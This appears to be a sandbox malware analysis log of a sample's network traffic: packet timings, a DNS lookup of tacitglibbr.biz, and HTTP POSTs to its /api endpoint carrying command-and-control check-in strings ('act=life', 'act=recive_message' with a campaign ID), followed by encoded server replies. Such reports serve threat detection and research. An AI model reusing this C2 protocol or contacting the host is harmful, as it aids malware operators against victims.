                                                                                                  Dec 16, 2024 17:15:04.875905037 CET49707443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:04.875917912 CET44349707104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:04.876014948 CET44349707104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:04.876066923 CET49707443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:04.876072884 CET44349707104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:04.882272959 CET44349707104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:04.882328987 CET49707443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:04.882335901 CET44349707104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:04.890765905 CET44349707104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:04.890829086 CET49707443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:04.890836000 CET44349707104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:04.899333000 CET44349707104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:04.899398088 CET49707443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:04.899405003 CET44349707104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:04.945693016 CET49707443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:04.995723009 CET44349707104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:05.039621115 CET49707443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:05.039633989 CET44349707104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:05.072921038 CET44349707104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:05.073025942 CET44349707104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:05.073055029 CET49707443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:05.073072910 CET44349707104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:05.073134899 CET49707443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:05.073141098 CET44349707104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:05.073251009 CET44349707104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:05.073306084 CET49707443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:05.073390007 CET49707443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:05.073407888 CET44349707104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:05.073420048 CET49707443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:05.073425055 CET44349707104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:05.321527004 CET49708443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:05.321563005 CET44349708104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:05.321666002 CET49708443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:05.321990013 CET49708443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:05.322001934 CET44349708104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:06.573146105 CET44349708104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:06.573219061 CET49708443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:06.577255964 CET49708443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:06.577266932 CET44349708104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:06.577589035 CET44349708104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:06.580566883 CET49708443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:06.580770016 CET49708443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:06.580800056 CET44349708104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:07.438623905 CET44349708104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:07.438755989 CET44349708104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:07.438807964 CET49708443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:07.439096928 CET49708443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:07.439120054 CET44349708104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:07.603631020 CET49709443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:07.603667021 CET44349709104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:07.603753090 CET49709443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:07.604286909 CET49709443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:07.604300022 CET44349709104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:08.827549934 CET44349709104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:08.827723980 CET49709443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:08.829083920 CET49709443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:08.829097986 CET44349709104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:08.829591036 CET44349709104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:08.831099033 CET49709443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:08.831173897 CET49709443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:08.831201077 CET44349709104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:08.831357956 CET49709443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:08.879336119 CET44349709104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:09.678708076 CET44349709104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:09.678952932 CET44349709104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:09.679017067 CET49709443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:09.784811974 CET49709443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:09.784852982 CET44349709104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:10.352220058 CET49710443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:10.352255106 CET44349710104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:10.352318048 CET49710443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:10.352735043 CET49710443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:10.352749109 CET44349710104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:11.598526001 CET44349710104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:11.598592997 CET49710443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:11.600147009 CET49710443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:11.600152969 CET44349710104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:11.600477934 CET44349710104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:11.601980925 CET49710443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:11.602210045 CET49710443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:11.602246046 CET44349710104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:11.602324963 CET49710443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:11.602334023 CET44349710104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:12.546430111 CET44349710104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:12.546711922 CET44349710104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:12.546907902 CET49710443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:12.546907902 CET49710443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:13.024044037 CET49711443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:13.024104118 CET44349711104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:13.024319887 CET49711443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:13.024525881 CET49711443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:13.024539948 CET44349711104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:14.243725061 CET44349711104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:14.243881941 CET49711443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:14.245249033 CET49711443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:14.245261908 CET44349711104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:14.245508909 CET44349711104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:14.246872902 CET49711443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:14.246980906 CET49711443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:14.246988058 CET44349711104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:15.032516003 CET44349711104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:15.032618046 CET44349711104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:15.032668114 CET49711443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:15.035391092 CET49711443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:15.035412073 CET44349711104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:15.527945995 CET49712443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:15.527996063 CET44349712104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:15.528086901 CET49712443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:15.528383970 CET49712443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:15.528395891 CET44349712104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:16.746975899 CET44349712104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:16.747071981 CET49712443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:16.749133110 CET49712443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:16.749150038 CET44349712104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:16.749382973 CET44349712104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:16.750677109 CET49712443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:16.751873016 CET49712443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:16.751905918 CET44349712104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:16.753110886 CET49712443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:16.753158092 CET44349712104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:16.753943920 CET49712443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:16.753984928 CET44349712104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:16.754127026 CET49712443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:16.754159927 CET44349712104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:16.756329060 CET49712443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:16.756361961 CET44349712104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:16.756509066 CET49712443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:16.756539106 CET44349712104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:16.756551981 CET49712443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:16.756566048 CET44349712104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:16.756675959 CET49712443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:16.756701946 CET44349712104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:16.756725073 CET49712443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:16.756855011 CET49712443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:16.756882906 CET49712443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:16.799339056 CET44349712104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:16.799556971 CET49712443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:16.799603939 CET44349712104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:16.799633026 CET49712443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:16.799659014 CET44349712104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:16.799707890 CET49712443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:16.799742937 CET44349712104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:19.289283991 CET44349712104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:19.289378881 CET44349712104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:19.289490938 CET49712443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:19.289724112 CET49712443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:19.289746046 CET44349712104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:19.307634115 CET49715443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:19.307682037 CET44349715104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:19.307749033 CET49715443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:19.308212996 CET49715443192.168.2.8104.21.50.161
                                                                                                  Dec 16, 2024 17:15:19.308226109 CET44349715104.21.50.161192.168.2.8
                                                                                                  Dec 16, 2024 17:15:20.493180990 CET49715443192.168.2.8104.21.50.161
                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Dec 16, 2024 17:15:00.530872107 CET5930153192.168.2.81.1.1.1
                                                                                                  Dec 16, 2024 17:15:00.678344011 CET53593011.1.1.1192.168.2.8
                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                  Dec 16, 2024 17:15:00.530872107 CET192.168.2.81.1.1.10xc584Standard query (0)tacitglibbr.bizA (IP address)IN (0x0001)false
                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                  Dec 16, 2024 17:15:00.678344011 CET1.1.1.1192.168.2.80xc584No error (0)tacitglibbr.biz104.21.50.161A (IP address)IN (0x0001)false
                                                                                                  Dec 16, 2024 17:15:00.678344011 CET1.1.1.1192.168.2.80xc584No error (0)tacitglibbr.biz172.67.164.37A (IP address)IN (0x0001)false
                                                                                                  Dec 16, 2024 17:15:16.126475096 CET1.1.1.1192.168.2.80x3703No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                  Dec 16, 2024 17:15:16.126475096 CET1.1.1.1192.168.2.80x3703No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                  • tacitglibbr.biz
                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  0192.168.2.849706104.21.50.1614437588C:\Users\user\Desktop\wf1Ps82LYF.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-12-16 16:15:02 UTC262OUTPOST /api HTTP/1.1
                                                                                                  Connection: Keep-Alive
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                  Content-Length: 8
                                                                                                  Host: tacitglibbr.biz
                                                                                                  2024-12-16 16:15:02 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                  Data Ascii: act=life
                                                                                                  2024-12-16 16:15:02 UTC1015INHTTP/1.1 200 OK
                                                                                                  Date: Mon, 16 Dec 2024 16:15:02 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  Set-Cookie: PHPSESSID=tq484unrdvjpv3q1retpgn7dp0; expires=Fri, 11-Apr-2025 10:01:41 GMT; Max-Age=9999999; path=/
                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                  Pragma: no-cache
                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=50%2FBML0Wb3YjpbV1J61uC4smlVUzk%2BcDqAmbkq%2BsXwjECSWpa2w8FhYCv7NL2p8hJ8ZLK6P5pL3M65eSwX61QC8aimwV2oEx3Iw6MjSGUT%2FKCBXXqBx1nUirFz0G2l9%2Bn6c%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8f2ff847481d43b9-EWR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1593&min_rtt=1580&rtt_var=618&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=906&delivery_rate=1733966&cwnd=192&unsent_bytes=0&cid=b6c94e12fd908511&ts=829&x=0"
                                                                                                  2024-12-16 16:15:02 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                  Data Ascii: 2ok
                                                                                                  2024-12-16 16:15:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                  Data Ascii: 0


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  1192.168.2.849707104.21.50.1614437588C:\Users\user\Desktop\wf1Ps82LYF.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-12-16 16:15:04 UTC263OUTPOST /api HTTP/1.1
                                                                                                  Connection: Keep-Alive
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                  Content-Length: 47
                                                                                                  Host: tacitglibbr.biz
                                                                                                  2024-12-16 16:15:04 UTC47OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d
                                                                                                  Data Ascii: act=recive_message&ver=4.0&lid=PsFKDg--pablo&j=
                                                                                                  2024-12-16 16:15:04 UTC1016INHTTP/1.1 200 OK
                                                                                                  Date: Mon, 16 Dec 2024 16:15:04 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  Set-Cookie: PHPSESSID=eugdi597kom9v59bkpf4dkr6nu; expires=Fri, 11-Apr-2025 10:01:43 GMT; Max-Age=9999999; path=/
                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                  Pragma: no-cache
                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fTUdEZUhvXYlZqFyMQsS7R3KIqxaVqSmuO8bCBcQ9Qteg%2Bb9sXRTe8IcUDVsSK8oDXNVIJ2wTB9Ti%2B1NKUSOQaktakF%2Bv%2F7XuId5NXTeCRy1%2Fv6ToLUMq6jquo8PBXx9iHw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8f2ff85479d84bcd-BUF
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=14465&min_rtt=13028&rtt_var=7760&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=946&delivery_rate=119047&cwnd=32&unsent_bytes=0&cid=0a9ef75c5e484b67&ts=774&x=0"
                                                                                                  2024-12-16 16:15:04 UTC353INData Raw: 34 39 31 63 0d 0a 79 79 57 77 2f 7a 34 63 48 4d 2f 30 4d 6f 32 63 6b 6f 7a 58 58 6f 6e 51 54 4a 59 54 6d 4a 63 37 72 69 30 53 38 5a 37 43 43 74 2b 77 42 38 62 64 42 43 67 77 37 59 64 58 72 36 62 6d 2f 71 49 37 70 66 49 74 38 6a 47 69 38 56 72 43 58 6e 66 64 76 4c 52 6e 2f 66 46 44 30 5a 4e 4e 65 54 44 74 6b 55 71 76 70 73 6e 33 39 54 76 6e 38 6e 61 30 64 76 4c 31 57 73 4a 50 63 35 72 78 73 6d 61 38 6f 30 6e 58 6c 31 74 2f 65 4b 36 59 58 2b 6a 35 39 2b 32 39 4d 4f 43 39 4a 50 73 78 74 4c 56 65 31 41 38 6f 30 39 4f 6e 66 72 36 47 52 4d 4f 55 48 47 45 77 74 4e 5a 58 34 37 36 6f 72 72 59 37 36 37 77 71 38 6e 6a 77 2f 31 50 4b 54 6e 61 62 37 71 74 73 74 36 4e 48 31 4a 5a 52 64 6d 79 6a 6b 6c 6a 6a 2f 2f 33 74 39 58 4b 72 74 54 61 30 4b 62 71 6d 61 38 39 65 59
                                                                                                  Data Ascii: 491cyyWw/z4cHM/0Mo2ckozXXonQTJYTmJc7ri0S8Z7CCt+wB8bdBCgw7YdXr6bm/qI7pfIt8jGi8VrCXnfdvLRn/fFD0ZNNeTDtkUqvpsn39Tvn8na0dvL1WsJPc5rxsma8o0nXl1t/eK6YX+j59+29MOC9JPsxtLVe1A8o09Onfr6GRMOUHGEwtNZX476orrY767wq8njw/1PKTnab7qtst6NH1JZRdmyjkljj//3t9XKrtTa0Kbqma89eY
                                                                                                  2024-12-16 16:15:04 UTC1369INData Raw: 64 63 33 36 2f 6e 6c 76 6b 2b 2b 4c 6c 76 44 48 6d 73 69 50 2b 66 76 6e 31 58 73 5a 46 66 35 6e 34 72 57 57 37 71 55 65 53 30 78 78 35 5a 75 33 4f 45 4d 7a 37 34 4f 6d 35 4b 71 6d 49 62 75 73 2f 34 37 56 65 77 41 38 6f 30 2f 53 6c 61 37 36 69 53 4e 47 56 56 32 78 2b 76 35 42 64 36 75 7a 32 36 37 73 32 36 4b 41 6b 2b 6e 66 35 2f 46 4c 46 53 6e 65 58 76 4f 34 6f 75 72 45 48 69 74 31 39 63 33 57 68 6e 45 66 76 76 75 2b 67 72 48 7a 73 76 6d 36 73 4d 66 37 30 58 63 31 4c 66 70 33 34 72 47 36 7a 70 45 6a 55 6c 31 78 35 64 4b 57 65 55 65 4c 31 2f 2b 36 77 4d 65 2b 30 49 76 56 30 75 72 73 5a 79 31 63 77 79 37 79 4f 62 37 36 37 42 65 65 65 55 6e 42 35 75 39 5a 50 6f 65 65 77 36 62 6c 38 73 2f 49 67 38 58 37 6f 39 45 76 4a 51 57 4b 66 2b 61 5a 6c 76 71 64 48 31 35
                                                                                                  Data Ascii: dc36/nlvk++LlvDHmsiP+fvn1XsZFf5n4rWW7qUeS0xx5Zu3OEMz74Om5KqmIbus/47VewA8o0/Sla76iSNGVV2x+v5Bd6uz267s26KAk+nf5/FLFSneXvO4ourEHit19c3WhnEfvvu+grHzsvm6sMf70Xc1Lfp34rG6zpEjUl1x5dKWeUeL1/+6wMe+0IvV0ursZy1cwy7yOb767BeeeUnB5u9ZPoeew6bl8s/Ig8X7o9EvJQWKf+aZlvqdH15
                                                                                                  2024-12-16 16:15:04 UTC1369INData Raw: 75 39 5a 50 6f 65 65 77 36 62 6c 38 73 2f 49 6a 2f 48 54 2f 2b 6c 6a 47 51 58 57 5a 38 4b 68 6d 76 72 74 49 31 70 31 51 64 6e 53 67 6d 46 54 6e 39 2f 76 6c 73 7a 7a 71 75 47 36 36 4d 66 33 74 47 5a 51 50 52 4a 54 77 72 57 66 2f 6e 45 54 63 6b 31 74 6f 50 72 4c 59 53 61 2f 35 2f 4b 37 74 66 4f 65 37 4c 76 39 37 2f 76 56 65 77 55 70 7a 6c 50 2b 74 62 37 65 6e 51 4e 61 52 56 58 4e 34 72 5a 46 55 36 75 7a 31 35 37 6b 77 71 2f 78 75 38 32 6d 36 72 52 6e 6a 53 47 61 51 30 36 4e 35 74 4f 6c 59 6e 49 51 63 65 58 4c 74 7a 68 44 6f 2b 2f 6a 6c 73 7a 54 72 6f 43 76 36 65 76 76 2f 58 38 31 43 66 4a 58 38 6f 57 69 37 70 55 66 56 6d 6b 35 73 65 36 75 45 57 71 2b 77 73 4f 6d 74 66 4c 50 79 47 4f 52 6d 36 2b 4d 62 2b 55 78 2b 6e 66 75 32 4b 4b 4c 6e 58 70 4b 61 55 44 34
                                                                                                  Data Ascii: u9ZPoeew6bl8s/Ij/HT/+ljGQXWZ8KhmvrtI1p1QdnSgmFTn9/vlszzquG66Mf3tGZQPRJTwrWf/nETck1toPrLYSa/5/K7tfOe7Lv97/vVewUpzlP+tb7enQNaRVXN4rZFU6uz157kwq/xu82m6rRnjSGaQ06N5tOlYnIQceXLtzhDo+/jlszTroCv6evv/X81CfJX8oWi7pUfVmk5se6uEWq+wsOmtfLPyGORm6+Mb+Ux+nfu2KKLnXpKaUD4
                                                                                                  2024-12-16 16:15:04 UTC1369INData Raw: 75 4c 31 2f 2b 57 6e 50 4f 61 32 49 76 42 35 38 66 38 5a 67 67 39 33 69 37 7a 34 4b 49 69 6b 53 4e 4b 65 53 6a 35 68 34 34 38 51 36 50 4b 77 74 76 55 77 35 62 49 68 2b 48 33 78 2f 56 6a 41 51 58 65 57 39 61 68 67 72 36 68 44 32 70 78 53 63 58 2b 70 6b 31 58 72 2b 66 54 6f 75 6e 79 6c 38 69 6e 73 4d 61 4b 31 64 75 74 36 4d 72 4c 47 34 48 66 7a 73 41 66 56 6b 52 77 6d 50 71 47 56 58 4f 66 78 39 75 65 35 4e 75 4b 35 49 76 39 31 39 76 78 63 79 6b 35 31 6c 76 32 6b 5a 4c 65 76 52 4e 47 53 55 33 46 32 37 64 67 51 36 4f 61 77 74 76 55 5a 2f 4c 6b 67 38 6a 48 6c 75 30 43 4d 53 48 7a 54 70 4f 42 6b 74 4b 39 42 31 35 46 64 65 48 61 6f 6e 6c 54 75 2b 50 62 74 75 6a 6a 75 73 79 48 77 66 66 54 2f 57 4d 31 44 65 35 7a 33 70 53 6a 7a 36 55 44 4b 33 51 51 2b 54 36 36 41
                                                                                                  Data Ascii: uL1/+WnPOa2IvB58f8Zgg93i7z4KIikSNKeSj5h448Q6PKwtvUw5bIh+H3x/VjAQXeW9ahgr6hD2pxScX+pk1Xr+fTounyl8insMaK1dut6MrLG4HfzsAfVkRwmPqGVXOfx9ue5NuK5Iv919vxcyk51lv2kZLevRNGSU3F27dgQ6OawtvUZ/Lkg8jHlu0CMSHzTpOBktK9B15FdeHaonlTu+PbtujjusyHwffT/WM1De5z3pSjz6UDK3QQ+T66A
                                                                                                  2024-12-16 16:15:04 UTC1369INData Raw: 2f 69 39 58 4b 72 74 54 61 30 4b 62 72 62 55 74 39 59 63 35 33 33 74 6e 50 39 74 67 6e 4c 33 56 74 79 50 76 58 57 55 2b 54 31 39 4f 36 35 50 4f 2b 2f 4c 75 5a 2b 2f 66 4a 51 78 31 31 36 6c 50 75 72 59 4c 61 6d 51 63 43 52 55 6d 78 37 76 34 51 51 6f 62 37 33 39 76 56 6b 71 34 51 70 35 47 48 35 74 32 6a 61 54 47 61 59 38 61 77 6f 6f 75 64 65 6b 70 70 51 50 69 62 74 6b 46 2f 6d 2f 66 2f 76 76 44 44 6d 74 79 66 78 63 50 7a 78 55 38 5a 50 64 70 58 39 70 57 4b 2b 71 45 33 62 6d 6c 52 35 66 62 2f 57 48 71 2f 35 36 4b 37 74 66 4d 4b 31 50 50 70 68 75 75 6f 58 31 51 39 33 6e 37 7a 34 4b 4c 6d 6a 53 4e 61 61 55 48 68 37 71 35 74 52 34 50 2f 77 34 62 45 33 34 72 51 76 2b 58 54 33 38 55 76 47 52 48 2b 66 39 61 78 6c 2f 65 63 48 31 59 55 63 4a 6a 36 63 6d 31 37 68 2b
                                                                                                  Data Ascii: /i9XKrtTa0KbrbUt9Yc533tnP9tgnL3VtyPvXWU+T19O65PO+/LuZ+/fJQx116lPurYLamQcCRUmx7v4QQob739vVkq4Qp5GH5t2jaTGaY8awooudekppQPibtkF/m/f/vvDDmtyfxcPzxU8ZPdpX9pWK+qE3bmlR5fb/WHq/56K7tfMK1PPphuuoX1Q93n7z4KLmjSNaaUHh7q5tR4P/w4bE34rQv+XT38UvGRH+f9axl/ecH1YUcJj6cm17h+
